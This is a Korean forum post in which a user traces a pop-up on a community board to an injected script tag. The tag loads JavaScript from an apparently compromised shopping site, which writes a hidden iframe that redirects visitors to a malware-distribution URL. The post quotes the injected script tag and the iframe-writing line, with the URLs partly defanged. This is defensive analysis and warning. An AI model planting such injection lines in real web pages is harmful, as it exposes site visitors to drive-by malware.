제 PC 는 회사업무용이라서 악성코드 접속을 네트워크 에서 막기 때문에

"딩동~"  이라고 글올리시는 분이 무슨뜻인지 모르다가 오늘 로또 사이트가 팝업으로

나타나길래 악성코드 분석해봤습니다

와싸다 게시판의 정상적인 URL 에서

http://w ww.wassada.com/bbs_index.php?file1=bbsdefault_community.html&file2=bbs_index_default_community.html 안의

글의 첫줄이나 상단에 

<s cript src="http://w ww.happy-mall.kr/doc/css/1.js"></s cript> 로 w ww.happy-mall.kr 로 링크가 걸어져

있습니다 이 사이트는  의자쇼핑몰 인데 감영된 좀비사이트 같습니다. (일단은 해당 사이트

운영자에게 알려주면 좋을듯 한데요)

이후 1.js 로 이동하면

...



document.write("<i frame src="http://w ww.happy-mall.kr/doc/css/ad.html" width="60" height="1" frameborder="0"></iframe>");}

...

iframe 으로 ad.html 화면을 열게 되는데 이후 여기서 악성코드 유포사이트인

http://c ount22. 51yes.c om/click.aspx?id=228968616&logo=1 (위험... 여기는 막혀서 들어가지가 않네요. 사이트명에 공백 여러개 넣어서 클릭시 열리지는 않게하였습니다) 로 접속을 유도하네요  



여기까지 해봤습니다.